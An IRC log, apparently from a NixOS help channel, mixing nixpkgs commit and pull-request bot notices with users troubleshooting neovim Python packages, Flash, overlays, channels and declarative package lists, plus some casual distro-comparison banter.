<adisbladis[m]> bkchr: :(
<adisbladis[m]> And I don't really have the time to debug this right now
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<{^_^}> [nixpkgs] @Mic92 merged pull request #44003 → Add missing semicolon to weechat example → https://git.io/fNlFk
<{^_^}> [nixpkgs] @Mic92 pushed commit from @alyssais to master « doc: add missing semicolon to weechat example (#44003) »: https://git.io/fNlFQ
<{^_^}> [nixpkgs] @Mic92 merged pull request #44000 → circleci-cli: 2018-05-12 -> 0.1.0 → https://git.io/fNlMF
<{^_^}> [nixpkgs] @Mic92 pushed 2 commits to master: https://git.io/fNlbJ
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<{^_^}> [nixpkgs] @Mic92 pushed 2 commits to master: https://git.io/fNlbo
<{^_^}> [nixpkgs] @Mic92 merged pull request #43995 → neovim: fix the xsel path in the clipboard runtime provider → https://git.io/fNlK8
<jD91mZM2> How do you get the neovim python package? I tried (python3.withPackages (pkgs: [ pkgs.neovim ])), but it's not being picked up
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<jD91mZM2> "WARNING: Latest nvim-python-neovim is NOT installed: 0.2.6"
<jD91mZM2> Says I have 0.2.4 installed so maybe I am a moron and just need unstable
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<{^_^}> [nixpkgs] @Mic92 opened pull request #44004 → Python37 fixes → https://git.io/fNlb7
<jD91mZM2> Oh yeah I'm stupid, ignore me
<{^_^}> [nixpkgs] @dotlambda pushed 3 commits to python-unstable: https://git.io/fNlbN
<bkchr[m]> adisbladis: np
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<{^_^}> [nixpkgs] @dotlambda pushed to python-unstable « python.pkgs.ipython: allow prompt_toolkit 2.0 »: https://git.io/fNlN2
<jD91mZM2> Never mind, it still complains about outdated neovim, even though I tried (unstable.python.withPackages (_pkgs: with unstable.python27Packages; [ neovim ])) which is like specifying unstable twice
<jD91mZM2> /nix/store/*-python-2.7.15-env/lib/python2.7/site-packages/neovim points to 0.2.4
<manveru> jD91mZM2: did you try :UpdateRemotePlugins ?
<manveru> at least i need to do that after every update for deoplite and denite
<jD91mZM2> I didn't, but it doesn't appear to help
<manveru> what does :checkhealth say?
<jD91mZM2> Outdated version, 0.2.4 != 0.2.6
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<manveru> hmm
<jD91mZM2> Ok so I lied about /nix/store/*-python-2.7.15, I have multiple. Some of them are 0.2.6
<jD91mZM2> Where is neovim getting the store path from?
<manveru> i don't have much time atm :(
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<jD91mZM2> Oh, you're using a neovim override. Yeah I'm not doing that
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<manveru> yeah, so it uses python3
<jD91mZM2> I'm using a good old init.vim
<jD91mZM2> Why does nixos-rebuild test create a result directory? Doesn't it activate it?
<jD91mZM2> Ok so interesting
<jD91mZM2> python -c "import neovim; neovim.__file__" returns the right path
<jD91mZM2> Using nvim-python returns the wrong one
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<{^_^}> [cabal2nix] @peti pushed 3 commits to master: https://git.io/fNlAK
<jD91mZM2> manveru: Making neovim use unstable also works
<{^_^}> [nixos-homepage] @edolstra merged pull request #229 → Removes useless escapes from `ppNix` in options page. → https://git.io/fovPq
<{^_^}> [nixos-homepage] @edolstra pushed 2 commits to master: https://git.io/fNlAN
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<{^_^}> [cabal2nix] @peti pushed to master « hslua: use more reliable pkgconfig mechanism to find the lua system library »: https://git.io/fNlxt
<{^_^}> [cabal2nix] @peti pushed to master « hslua: use more reliable pkgconfig mechanism to find the lua system library »: https://git.io/fNlxG
<{^_^}> [cabal2nix] @peti pushed 0 commits to master: https://git.io/fNlx8
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<bkchr[m]> Someone else also can not build pycurl on current master?
<jD91mZM2> Oh, I get it, the neovim package includes the python stuff already
<{^_^}> [nixpkgs] @Mic92 merged pull request #43957 → gitea: 1.4.2 -> 1.4.3 → https://git.io/fNlJZ
<{^_^}> [nixpkgs] @Mic92 pushed 2 commits to master: https://git.io/fNlxV
<{^_^}> [nixpkgs] @Mic92 closed pull request #43997 → gitea: 1.4.2 -> 1.4.3 → https://git.io/fNl6o
<{^_^}> [cabal2nix] @peti pushed to master « hslua: drop obsolete post-process fix »: https://git.io/fNlx6
<{^_^}> [cabal2nix] @peti pushed 0 commits to master: https://git.io/fNlxS
<ajs124> 0 commits?
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<{^_^}> [nixpkgs] @Mic92 pushed to master « alacritty: 2018-05-09 -> 2018-07-20 »: https://git.io/fNlpp
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<{^_^}> [nixpkgs] @Mic92 opened pull request #44005 → [backport] gitea: 1.3.3 -> 1.4.3 (security + bug fixes) → https://git.io/fNljY
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<{^_^}> [cabal2nix] @peti pushed to master « hslua: fix post-processing failure caused by use of 'each' »: https://git.io/fNlja
<wucke13> Hey there, would someone mind to check wether this works (=builds) on his computer? `nix-shell -p 'python27.withPackages(ps: with ps; [colorama dateparser scikitlearn numpy pandas matplotlib ])' `
<{^_^}> [nixpkgs] @Mic92 merged pull request #44004 → python37.pkgs.{pycodestyle,pyflakes,flake8,pystemmer} → https://git.io/fNlb7
<{^_^}> [nixpkgs] @Mic92 pushed 3 commits to python-unstable: https://git.io/fNlji
<{^_^}> [nixpkgs] @peti pushed to haskell-updates « hackage-packages.nix: automatic Haskell package set update »: https://git.io/fNljX
<{^_^}> [nixpkgs] @basvandijk pushed to master « .github/CODEOWNERS: add basvandijk to Haskell »: https://git.io/fNljH
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<jD91mZM2> wucke13: collision between ssl_match_hostname's __init__.py and functools_lru_cache's
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<wucke13> jD91mZM2: thanks, thats what I'm getting too
<FRidh> wucke13: common issue with Python 2.7
<FRidh> use python.buildEnv
<FRidh> and ignoreCollisions
<FRidh> see the Nixpkgs manual
<{^_^}> [nixpkgs] @Mic92 merged pull request #44005 → [backport] gitea: 1.3.3 -> 1.4.3 (security + bug fixes) → https://git.io/fNljY
<{^_^}> [nixpkgs] @Mic92 pushed 6 commits to release-18.03: https://git.io/fN8fx
<FRidh> but, why use python27?
<{^_^}> [nixpkgs] @offlinehacker merged pull request #43657 → buildGoPackage: add shellHook attribute → https://git.io/fN3dk
<{^_^}> [nixpkgs] @offlinehacker pushed 2 commits to master: https://git.io/fN8Jf
<etu> FRidh: Great work with the PHP PR, the derivation is so much easier to read:)
<wucke13> Thanks for the information. I was asked by a friend who happens to have used python2. Porting to python3 was easy though, so from my side this is fixed
<wucke13> Good to know that python2 becomes itchy
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<FRidh> etu: glad you like it. Will wait with merging a couple more days
<__monty__> And here we are supporting something back to py2.6 : |
<FRidh> oh my
<{^_^}> [nixpkgs] @alyssais opened pull request #44006 → gotop: works on non-Linux Unixes → https://git.io/fN8Jp
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<{^_^}> [nixpkgs] @ttuegel opened pull request #44007 → Emacs package updates → https://git.io/fN8Uu
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<ckauhaus> periklis: I'm currently reviewing https://github.com/NixOS/nixpkgs/issues/43999
<{^_^}> #43999 (by periklis, open): vulnix 1.7: build broken von macos
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<ckauhaus> I wonder what you've tried to do - vulnix 1.7 has been checked in on master, but your system output shows that you're running on 18.03
<ckauhaus> nixos-18.03 contains vulnix-1.4 which installs fine
<FRidh> master now has pyyaml 3.13
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<ckauhaus> ic
<ckauhaus> trying to recreate the problem
<ckauhaus> I wonder that I've got no mail from hydra
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<periklis> ckauhaus: thank you, beyond hydra there are also private/enterprise builders :)
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<ckauhaus> ok, I got the same failure
* ckauhaus fixin'
<__monty__> clever: Thanks so much for toxvpn and the help. Now I can finally access the containers on my LAN from anywhere with a reverse proxy : )
<__monty__> clever++
<{^_^}> clever's karma got increased to 14
<{^_^}> [nixpkgs] @dtzWill opened pull request #44008 → tig: 2.3.3 -> 2.4.0 → https://git.io/fN8kf
<{^_^}> [nixpkgs] @domenkozar pushed to master « haskellPackages.servant-streaming-server: dontCheck »: https://git.io/fN8k3
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<{^_^}> [nixpkgs] @FRidh opened pull request #44009 → Merge staging-next into master → https://git.io/fN8I3
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<ckauhaus> FRidh: I think specifying 'pyyaml==3.12' instead of 'pyyaml>=3.12' in setup.py was actually a mistake
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<Izorkin> how-to replace default function callPackage to custom? https://pastebin.com/Ycpk8yKY Need called pkgs.packname with callPackage = pkgs.lib.callPackageWith (pkgs // self);
<FRidh> ckauhaus: well you likely dont' want 4.1 which was released and retracted
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<WilliamHamilton[> what's the way to install flash nowadays (using nixpkgs.config.firefox.enableAdobeFlash = true; as written in the manual fails)?
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<ckauhaus> FRidh: that's right
<sphalerite> WilliamHamilton[: I think that's the right way, it's just that adobe have broken the download link again and nobody's updated the package yet. I think.
<srhb> WilliamHamilton[: fwiw it works on unstable. Looks like a missing backport.
<WilliamHamilton[> srhb: wait, but I am on unstable
<srhb> WilliamHamilton[: nixos-unstable? tbf I'm a little ahead, more like master from a few days ago..
<WilliamHamilton[> in fact, I updated a few minutes ago just to be sure
<srhb> WilliamHamilton[: 1e4cd7a81014b2dce0f7590e90bbb42ab9e74fc2 and 90380d0fa947a5fbb072474238c4440518c7b834
<srhb> At least those are different from upstream/nixos-unstable and my HEAD
<WilliamHamilton[> ok, so I'll try to install from today's master, thanks
<WilliamHamilton[> sphalerite: thanks for the explanation for why this happens
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<{^_^}> [nixpkgs] @Mic92 merged pull request #44008 → tig: 2.3.3 -> 2.4.0 → https://git.io/fN8kf
<{^_^}> [nixpkgs] @Mic92 pushed 2 commits to master: https://git.io/fN8Lf
<sphalerite> WilliamHamilton[: you could also try unstable-small
<dtz[m]> \o/
<dtz[m]> lol
<WilliamHamilton[> sphalerite: what's unstable-small?
<sphalerite> the nixos-unstable-small channel
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<{^_^}> [nixpkgs] @Mic92 merged pull request #44006 → gotop: works on non-Linux Unixes → https://git.io/fN8Jp
<WilliamHamilton[> I never heard of it
<{^_^}> [nixpkgs] @Mic92 pushed 2 commits to master: https://git.io/fN8Lq
<sphalerite> it has a smaller test set, notably not including graphical stuff
<sphalerite> so it advances faster. The -small channels are recommended for servers and such, to get security updates in faster
<sphalerite> (there's a corresponding nixos-18.03-small too)
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<WilliamHamilton[> sphalerite: I see, thank you. And since I can mix and match channels, I could install flash from there
<sphalerite> WilliamHamilton[: yeah although it's a bit more fiddly to mix channels for nixos config
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<sphalerite> easiest solution is putting the flash-enabling setting in your .config/nixpkgs/config.nix and running nix-env -f channel:nixos-unstable-small -iA firefox
<{^_^}> [nixpkgs] @frontsideair opened pull request #44010 → flow: 0.76.0 -> 0.77.0 → https://git.io/fN8Ly
<sphalerite> it is a bit stateful though…
<sphalerite> or you could nixos-rebuild switch -I nixpkgs=channel:nixos-unstable-small
<sphalerite> to use nixos-unstable-small one-off
<WilliamHamilton[> ok, thanks; where can I see every nixpkgs configuration option?
<tilpner> WilliamHamilton[ - man configuration.nix
<sphalerite> WilliamHamilton[: unfortunately that's only nixos configuration, not nixpkgs configuration (like the flash thing)
<sphalerite> there is no central place for nixpkgs config >_<
<WilliamHamilton[> ok, so how does people browse the nixpkgs config usually?
<tilpner> Oh, misread
<sphalerite> WilliamHamilton[: AFAIK, they don't.
<sphalerite> there's not much there anyway though
<sphalerite> just that browser plugins stuff (which shouldn't really be there IMHO) and allow{Unfree,Broken,Insecure} stuff
<sphalerite> oh also packageOverrides
<sphalerite> although that might be removed one day.
<{^_^}> [nixpkgs] @mkaito opened pull request #44011 → tor: fix failing Hydra build → https://git.io/fN8tV
<RetardedOnion> sphalerite: why would packageOverrides be removed?
<sphalerite> #43266 #43560
<{^_^}> https://github.com/NixOS/nixpkgs/issues/43266 (by lheckemann, open): Deprecate packageOverrides?
<{^_^}> https://github.com/NixOS/nixpkgs/pull/43560 (by lheckemann, open): [WIP] Deprecate packageOverrides
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<RetardedOnion> sphalerite: thanks for the heads up. i just set up nix how i like (i hope) with overrides. so knowing that is a bit smashing....:D
<sphalerite> it's next to trivial to convert a packageOverrides function to an overlay
<sphalerite> see the deprecation warning in the PR
<sphalerite> your work won't be lost :)
<__monty__> True, but trivial busywork is still busywork : )
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<sphalerite> __monty__: still nicer than having the confusion between packageOverrides, foo.override, foo.overrideAttrs, foo.overrideDerivation, and overlays for every new user :)
<{^_^}> [nixpkgs] @7c6f434c merged pull request #43853 → singular: 4.1.1p1 -> 4.1.1p2 → https://git.io/fNCoO
<{^_^}> [nixpkgs] @7c6f434c pushed 2 commits to master: https://git.io/fN8qO
<RetardedOnion> i gotta say the docs of nix are not "arch-grade" so looking on gits for configurations to help you is what i went for. and i hope it went fine.
<sphalerit> RetardedOnion: I absolutely agree, and we're always working to improve it
<sphalerit> Deprecating packageOverrides is my current little corner of the effort
<sphalerit> Arch has a lot more people working on it, including the docs 😅
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<RetardedOnion> sphalerit: i thought "deleting one patch and adding a few different patchfiles" wouldnt require too much effort. i was wrong:D https://nixos.org/nixpkgs/manual/#chap-overlays makes me feel even more alone
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<RetardedOnion> i have 4 packages in the aur. i quite like arch. it just has some(many) issues
<__monty__> I actually think the docs that *are* there are of higher quality. I'v run into some *terrible* docs on the arch wiki. Can't be beat for coverage and examples though.
<__monty__> It's just that the arch docs paradoxically run counter to the arch philosophy of understanding your system. It's more "blindly type these commands and it'll 'just work'."
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<__monty__> sphalerite: Confusion shmonfusion, I'll just wait till it breaks : )
<etu> RetardedOnion: I've been on arch but moved over to NixOS more than a year ago due to my active hate of their need to always upgrade. If you don't upgrade you can't install stuff. And whenever you upgrade the kernel they *rip out* the working kernel and it's modules from the filesystems and put a new in place so you can't load modules if you upgraded the system.
<RetardedOnion> __monty__: i agree. though arch has gotten very casual with many distros that shouldnt exist. so the wiki gets flooded with more crap.
<etu> And people using AUR helpers installing random stuff from there
<etu> I'm surprised that they didn't find malware in there earlier than a few weeks ago
<RetardedOnion> etu: you need to upgrade every 3 months if packages get replaced. dont -Sy, always -Syu or just -S. the modules can be backed up easily with a hook that places them in /tmp.
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<RetardedOnion> yep. aur helpers are a real pain. dont blame the aur, blame yourself. the aur is community maintained and supervised
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<RetardedOnion> even snapshots is easy with snapper, snap-pac and snap-pac-grub.
<etu> I still prefer the NixOS way
<etu> :)
<|Leary> pacman isn't a real package manager, it only attempts to achieve a consistent state after a complete update. If you install new packages without updating everything else you can break things.
<__monty__> etu: I suspect they just didn't look.
<etu> __monty__: Yeah, that's my theory as well
<RetardedOnion> there was malware found in the aur.
<RetardedOnion> a few weeks ago
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<etu> RetardedOnion: Yeah, I said. And I was surprised that they haven't found something like that earlier.
<RetardedOnion> |Leary: that is the whole idea behind it. "simplicity" and "partial upgrades are not supported"
<|Leary> Imo it's a pretty bad idea. >.>
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<RetardedOnion> its a pain to package for debian/nix/anything else though.
* etu find nix easier to package than debian
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* __monty__ finds nix easier to package than anything else, including arch
<{^_^}> [nixpkgs] @ttuegel merged pull request #44007 → Emacs package updates → https://git.io/fN8Uu
<{^_^}> [nixpkgs] @ttuegel pushed 8 commits to master: https://git.io/fN8ma
* RetardedOnion likes nix waaay more than deb
<RetardedOnion> |Leary: its not meant for mass use. its for people who want upstream and new software. it should never replace ubuntu or such crap. so its mainly for devs. it has no reason to be this big. but that is why i used it.
* etu has 8 years of experience of gentoo as well, gentoo is quite easy to package for
<RetardedOnion> __monty__: why do you think that? its just bash script with a few variables
<__monty__> That sounds like a nightmare.
<RetardedOnion> i think we can conclude that debian sucks in many ways.
<betaboon> is it possible to define arguments for a nixops deployment in a file instead of using setargs ?
<RetardedOnion> __monty__: i find this pretty simple: https://git.archlinux.org/svntogit/community.git/tree/trunk/PKGBUILD?h=packages/filezilla
<__monty__> All of arch, debian and nixos suck in many ways, they're also great in many ways.
<goibhniu> __monty__++
<{^_^}> __monty__'s karma got increased to 1
<etu> Yep, all distros are bad :D
<etu> Just different kinds
<__monty__> Distros would be so much better if it weren't for computers ; )
<etu> computers--
<mkaito> go package wxPython for python 3.6 and come back to tell me how much fun Nix packaging is
<RetardedOnion> can we purge python already?
<__monty__> mkaito: We didn't say fun though.
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<mkaito> might as well try to purge javascript
<mkaito> I just wanted to run Pyfa on NixOS. Requires both python 3.6 and wxPython. So now I run it in a windows VM.
<mkaito> because NixOS
<RetardedOnion> purge the complete www. waay too much overhead
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<RetardedOnion> 400m ram for a bit of text and 2 pictures.
<mkaito> I can't even get the folks are work to use email. If you take away their fancy webapps, they will probably all just die.
<sphalerit> Well nixos doesn't support partial upgrades very well either :/
<sphalerit> It's certainly possible, just not easy
<goibhniu> mkaito did you try installing it using nix-shell and virtualenv?
<joehh> __monty__: agreeing with you, I think one of debian's biggest contributions is their pickiness over licensing and insistence on documenting that as part of their packaging. The effort that goes into the debian/copyright file is a huge benefit to the whole OS community
<RetardedOnion> sphalerit: why would you do partial upgrades? i dont see the appeal
<mkaito> goibhniu: sure. there's no python36Packages.wxPython in nixpkgs, so that didn't work. But it's not like I'm a python expert, I just want to run this thing.
<mkaito> RetardedOnion: it happens when something blows up half way through
<etu> sphalerit: Pulling in specific things from another channel would be one way
<RetardedOnion> joehh: additionally debian patches are never upstream(builds a monopoly, fuck that), apt sucks and debian isnt anything special. we can purge it as well.
<goibhniu> mkaito ah yeah, you can usually install python stuff that isn't in nixpkgs with pip in a virtualenv ... I can give you a hand if you want to try that out ... it has caveats, but I suspect it will be nicer than using Windows
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<mkaito> goibhniu: considering that windows 10 runs like molasses without proper 3D acceleration, probably, yes.
<mkaito> goibhniu: if you want to give it a crack, here's the thing I want to run https://github.com/pyfa-org/Pyfa
<RetardedOnion> mkaito: doesnt win10 use software rendering if no proper gpu is there?
<{^_^}> [nixpkgs] @ckauhaus opened pull request #44012 → vulnix: 1.7 -> 1.7.1 → https://git.io/fN8YD
<mkaito> RetardedOnion: yes. it does. hence, molasses rather than not at all.
<__monty__> mkaito: Why a windows VM anyway? Even windows basically comes with a linux vm nowadays, so just run a light linux distro in a container.
<mkaito> a container doesn't have graphic output AFAIK, this is a GUI app.
<RetardedOnion> __monty__: shitty solution that breaks more often. ntfs/windows sucks, REEEEDOM
<RetardedOnion> well windows 10 went full botnet.
<mkaito> and if you want to have some REAL fun, try building this on nixos https://bitbucket.org/krojew/evernus/src/default/
<__monty__> mkaito: Not sure that's true but if it is there's still kvm.
<joehh> RetardedOnion: not sure I completely understand you, but I think you are right, debians most important contribution is not their packaging system or packages. It is their inertia/historical importance and non technical aspects (documentation of licensing etc). I feel they are at risk of becoming irrelevant otherwise
<RetardedOnion> i assume you meant WSL. it sucks, has no x and no support for not shitty filesystems. all typlical windows crap is still there
<RetardedOnion> joehh: they got some history. well GB had some history. i dont think debian should exist nowadays.
<__monty__> mkaito: Actually, according to this first google result running gui apps in containers isn't hard: http://fabiorehm.com/blog/2014/09/11/running-gui-apps-with-docker/
<joehh> GB?
<mkaito> __monty__: guess the so-hated X11 model has its advantages. try doing that with wayland.
<RetardedOnion> joehh: great britian
<joehh> :)
<sphalerit> RetardedOnion: package you need breaks in update, you want everything else updated though
<RetardedOnion> x has disadvantages. especially with security. wayland will never finish since bsd doesnt care anymore. so linux on the desktop will stay "complicated"
<asymmetric> hey peepz, i'm having a hard time packaging a java app that uses maven - i tried the mvn2nix tool but it's unmaintained unfortunately
<RetardedOnion> sphalerit: i get that. i would maybe try to fix it or just use an older snapshot
<asymmetric> and it has bugs - like that it can't download libraries that don't have a checksum
<sphalerit> etu: yes it's just no fun. nixpkgs.* config options don't apply to separately imported nixpkgs for instance. You have the overhead of evaluating another nixpkgs. Multiple versions of other stuff in the store. Hence "possible but not easy"
<asymmetric> how are people packaging stuff that uses maven?
<etu> sphalerit: yeah...
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<betaboon> anyone knows if you can set arguments in nixops using a file instead of set-args ?
<sphalerit> RetardedOnion: yes, but you might not have time to fix it, and need other stuff updated
<sphalerit> For some bugfix in other stuff or similar
<sphalerit> This is biting me especially on my Chromebook, where I have to build most of the stuff locally because it's armv7
<sphalerit> And stuff tends to break because it's not an officially supported arch
<sphalerit> So I haven't updated my system in 2 months because rust has been broken and I have better and easier stuff to fix
<RetardedOnion> tbh, never had such problems where updates broke something so essential that i would consider it a "partial upgrade". just because i use an old quassel, my system wont break
<{^_^}> [nixpkgs] @Mic92 merged pull request #44012 → vulnix: 1.7 -> 1.7.1 → https://git.io/fN8YD
<{^_^}> [nixpkgs] @Mic92 pushed 2 commits to master: https://git.io/fN83c
<RetardedOnion> are there any plans for arm support? i was interested in an asus tinkerboard, since its not crap and has some power
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<{^_^}> [nixpkgs] @FRidh pushed to python-unstable « python.pkgs.pandas: fix build »: https://git.io/fN832
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<{^_^}> [nixpkgs] @Mic92 merged pull request #44011 → tor: fix failing Hydra build → https://git.io/fN8tV
<{^_^}> [nixpkgs] @Mic92 pushed 2 commits to master: https://git.io/fN83a
<bebarker> In nixos, what package is /etc/localtime installed from? somehow it is not present in my NixOS (and non-nixos nix) installations?
<{^_^}> [nixpkgs] @ciil opened pull request #44013 → atlassian-jira: 7.9.2 -> 7.11.0 → https://git.io/fN83o
<sphalerit> RetardedOnion: yes but using old quassel in your nixos config is no fun
<{^_^}> [nixpkgs] @vbgl pushed 3 commits to master: https://git.io/fN83i
<sphalerit> bebarker: I'm not on my computer so I can't check properly just now but chances are it's either not present at all, or set by a config module
<RetardedOnion> sphalerit: maybe my applications arent as complicated that i need to do that on a regular basis or it never happened to me. then again, i am VERY new to nix
<sphalerit> RetardedOnion: aarch64 is more or less supported.
<sphalerit> RetardedOnion: armv7 isn't officially supported but works reasonably well
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<sphalerit> There's a wiki page for nixos on arm in general, can't get the link for you easily right now cause I'm on my phone
<sphalerit> But I'm sure you can find it ;)
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<srhb> bebarker: It's not a package indeed. It's symlinked in place from tzdata during the activation process
<{^_^}> [nixpkgs] @vbgl closed pull request #44010 → flow: 0.76.0 -> 0.77.0 → https://git.io/fN8Ly
<RetardedOnion> sphalerit: thanks for the heads up. the pine64 is aarch64 i think. though i really dislike allwinner
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<__monty__> RetardedOnion: I have it happen regularly with development packages, where I need a new bit of api from one but another is broken. Usually it's an easy "fix" but it's still annoying.
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<srhb> bebarker: Part of the whole etc store path :)
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<{^_^}> [nixpkgs] @hamhut1066 closed pull request #43656 → postman: refactor out icon dependency → https://git.io/fN3yA
<bebarker> srhb, interesting - so as somewhat expected I did `nix-env -i tzdata` which installed some new packages, but still not /etc/localtime
<srhb> bebarker: No amount of installing any package will ever create it.
<clever> bebarker: nix-env only ever adds packages to ~/.nix-profile/
<srhb> bebarker: Only running the activation scripts (which nixos-rebuild switch does) will make it happen.
<srhb> Based on, iirc, time.timeZone
<bebarker> ok, so for non nixos, i should probably just install this via the base os
<srhb> Probably.
<sphalerit> RetardedOnion: indeed it is, hence the name :D
<RetardedOnion> clever: so i can easily sync packages with just syncing ~/.nix-profile/?
<{^_^}> [nixpkgs] @jluttine opened pull request #44014 → pythonPackages.salmon-mail: 3.0.1 -> 3.0.2 → https://git.io/fN8s4
<clever> RetardedOnion: ~/.nix-profile can only be modified with nix-env, so you cant rsync it to another machine
<RetardedOnion> clever: ok... how would you go about doing that?
<clever> RetardedOnion: create a config.nix with a buildEnv override, and install that
<clever> then sync the config.nix over and install it again
<RetardedOnion> so no easy way to sync packages between two machines. shucks.
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<{^_^}> [nixpkgs] @FRidh merged pull request #44014 → pythonPackages.salmon-mail: 3.0.1 -> 3.0.2 → https://git.io/fN8s4
<{^_^}> [nixpkgs] @FRidh pushed 2 commits to master: https://git.io/fN8sH
<dtz[m]> So is that extraUtils-all-jobs-are-failing still happening?
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<dtz[m]> We need sirens and red lights
<sphalerit> RetardedOnion: you wouldn't want to do this with any other package manager either. The point is for the package manager to know what's going on, and if you fiddle with the files behind its back the state of the package manager and the actual files will be inconsistent with each other.
<dtz[m]> Shame the email thing had to stop
<dtz[m]> I understand why lol but it's just strange to have things all failing and NOT alert all the people haha
<sphalerit> You could hypothetically sync the entirety of the nix store together with the database between two machines, but you'd have to take extreme (unreasonable IMHO) care not to make any concurrent changes
<RetardedOnion> sphalerit: would i be able to create a file for all packages so i could just pass the file to xargs to install it? -q gives version numbers. is that possible
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<__monty__> RetardedOnion: That's basically what the config.nix with a buildEnv would achieve.
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<sphalerit> RetardedOnion: that's sort of what clever suggested, except what clever suggested is better
<RetardedOnion> __monty__: but i would have to do it myself. i thought about nix-env -q > file and then just xargs -a file nix-env -i on the other machine.
<{^_^}> [nixpkgs] @alexshpilkin opened pull request #44015 → networking: include local Unbound in resolv.conf → https://git.io/fN8GH
<__monty__> RetardedOnion: Well the idea is you'd only ever nix-env -iA nixpkgs.yourBuildEnv. And just edit config.nix when you want to add/remove a package.
<__monty__> It's basically switching from imperative to declarative package management. Which is nix's forte.
<RetardedOnion> __monty__: ok. thanks. so i just have to write all my packages into the config.nix. thats not fun. whatever...
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<__monty__> You could write your own wrapper that does so for you.
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<RetardedOnion> just a bit overkill
<tilpner> __monty__ - How would you do the translation from name to attribute path?
<__monty__> Evaluate *all* of nixpkgs ; )
<tilpner> D:
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<clever> __monty__: some names map to several attribute paths
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<sphalerit> tilpner: well that's what nix-env -u does anyway!
<tilpner> :/
<__monty__> I didn't necessarily mean you'd use package names though, I meant a script that literally adds the line you specify to config.nix at an appropriate line.
<__monty__> I don't know why editing a file is "not fun", I'm just saying if you're motivated enough you don't *have* to ; )
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<RetardedOnion> i have some packages installed. i can probably just put "kdeconnect" or whatever in the file. maybe it works. still more work than just pacman -Qqe > file and then xargs -a file pacman -Syu
<sphalerite> RetardedOnion: specially crafted for you
<sphalerite> echo $'{ pkgs ? import <nixpkgs> {} }:\npkgs.buildEnv {\n name = "'"$USER"'-env";\n packages = with pkgs; ['; nix-env -f '<nixpkgs>' -qaP > /tmp/pkgs ; nix-env -q | while read name ; do grep -F "${name%%-[0-9]*}" /tmp/pkgs | awk '{ print $1 }' | head -n1 | sed 's/^/ /'; done ; echo $' ];\n}'
<sphalerite> ^ this should write you a declarative user env file :p
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<sphalerite> it's hacky and might not work perfectly, but hey
<RetardedOnion> sphalerit: i will have a quick look over it. thank you so much
<sphalerite> oops, s/packages/paths/ in it
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<sphalerite> ,todeclarative = echo $'{ pkgs ? import <nixpkgs> {} }:\npkgs.buildEnv {\n name = "'"$USER"'-env";\n paths = with pkgs; ['; nix-env -f '<nixpkgs>' -qaP > /tmp/pkgs ; nix-env -q | while read name ; do grep -F " ${name%%-[0-9]*}" /tmp/pkgs | awk '{ print $1 }' | head -n1 | sed 's/^/ /'; done ; echo $' ];\n}'
<{^_^}> todeclarative defined
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<robstrr> On my Mac, running `nix-env -i haskellPackages.ghcid` results in `error: selector 'haskellPackages.ghcid' matches no derivations`, 'nix-channel --list' yields `nixpkgs https://nixos.org/channels/nixpkgs-unstable` whats wrong here ?
<sphalerite> !-A
<{^_^}> You'll usually want to use nix-env -i with -A. It's faster and more precise. See https://nixos.wiki/wiki/FAQ/nix-env_-iA for details.
<sphalerite> robstrr: ^
<sphalerite> in this case it's just a matter of adding -A to your commnad
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<RetardedOnion> i am asking myself why linuxPackages_samus_4_12.acpi_call is there. nix-env -q says its 4.17-5. my configuration.nix has acpi specified.
<robstrr> sphalerite: ty, error: attribute 'nixos' in selection path 'nixos.haskellPackages.ghcid' not found - copy & paste frm the https://nixos.org/nixos/packages.html#ghcid
<sphalerite> robstrr: replace nixos with nixpkgs
<robstrr> sphalerite: makes sense ...
<sphalerite> the command is for nixos
<robstrr> sphalerite: thank you
<{^_^}> [nixpkgs] @ebzzry opened pull request #44016 → stumpish: init at 0.0.1 → https://git.io/fN8cm
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<{^_^}> [nixpkgs] @xaverdh opened pull request #44017 → android-file-transfer: init at 3.4 → https://git.io/fN8c9
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<bkchr[m]> Does anyone has a fix for the build problem of initrd?
<bkchr[m]> adisbladis:
<bkchr[m]> ?
<{^_^}> [nixpkgs] @Mic92 merged pull request #44013 → atlassian-jira: 7.9.2 -> 7.11.0 → https://git.io/fN83o
<{^_^}> [nixpkgs] @Mic92 pushed 2 commits to master: https://git.io/fN8Cy
<{^_^}> [nixpkgs] @matthewbauer merged pull request #43711 → Feature/ghc gmp → https://git.io/fNGYS
<{^_^}> [nixpkgs] @matthewbauer pushed 5 commits to master: https://git.io/fN8Ws
<lewo> Is there an example or tutorial on how to create a nixpkgs repository to host private expressions (how to fetch nixpkgs, usage of overlays, where to put private libraries, which repository layout...)?
<Profpatsch> pie__: Oh, ydou
<Profpatsch> *you
<{^_^}> [nixpkgs] @matthewbauer merged pull request #43700 → treewide: more fixes to tests → https://git.io/fNGJd
<{^_^}> [nixpkgs] @matthewbauer pushed 4 commits to master: https://git.io/fN8lz
<{^_^}> [nixpkgs] @Mic92 merged pull request #43962 → rustup: 1.11.0 -> 1.13.0 → https://git.io/fNlkl
<{^_^}> [nixpkgs] @Mic92 pushed 2 commits to master: https://git.io/fN8lH
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<Mic92> Profpatsch: looking at your pull requests, you seem to build docker containers again.
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<Mic92> lewo: Do you want to modify existing stuff or mostly add new expressions? We provide a growing list of examples in NUR: https://github.com/nix-community/NUR including templates: https://github.com/nix-community/nur-packages-template
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<lewo> Mic92: it's mostly to add new expressions
<robstrr> Is there a known problem with nix-repl under osx ? When installing I receive api.c:22:10: fatal error: 'endian.h' file not found
<Mic92> robstrr: do you mean `nix repl` or `nix-repl`?
<clever> robstrr: it has been merged into nix 2.0
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<robstrr> clever: whup, missed this
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<robstrr> Mic92: thank you :+1
<moredhel[m]> Hi all, I'm trying to include my overlays system-wide, but am really not sure how to do it. If I use the `nixpkgs.overlays` I can't access them in my user `nix repl`. I looked at https://nixos.wiki/wiki/Overlays#On_the_user_level to get it setup on the system level, but don't know where the top-level `options` variable is coming from...
<moredhel[m]> So, my question is, how do I enable overlays in my `/etc/nixos/configuration.nix` which can then be used by my user (such a using home-manager)
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<sphalerite> moredhel[m]: one way is to use `(import <nixpkgs/nixos> {}).pkgs` wherever you'd usually use `import <nixpkgs> {}`
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<lewo> Mic92: yeah, nur-packages-template is kind of things I'm looking for. Thanks
<Mic92> this sets NIX_PATH
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<Mic92> lewo: we probably in future improve documentation how to bypass NUR for your own repositories. At the moment it is more optimized for NUR.
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<{^_^}> [nixpkgs] @matthewbauer merged pull request #41970 → nixos/systemd: Allow building systemd without libmicrohttpd → https://git.io/vh61s
<{^_^}> [nixpkgs] @matthewbauer pushed 2 commits to master: https://git.io/fN842
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<moredhel[m]> hmm, that does work (I had to relogin to setup the correct VARS). This is pretty annoying though as I am having to duplicate the NIX_PATH into my configuration (rather than extending it).
<moredhel[m]> My follow-up question is how do I reference several overlays at once?
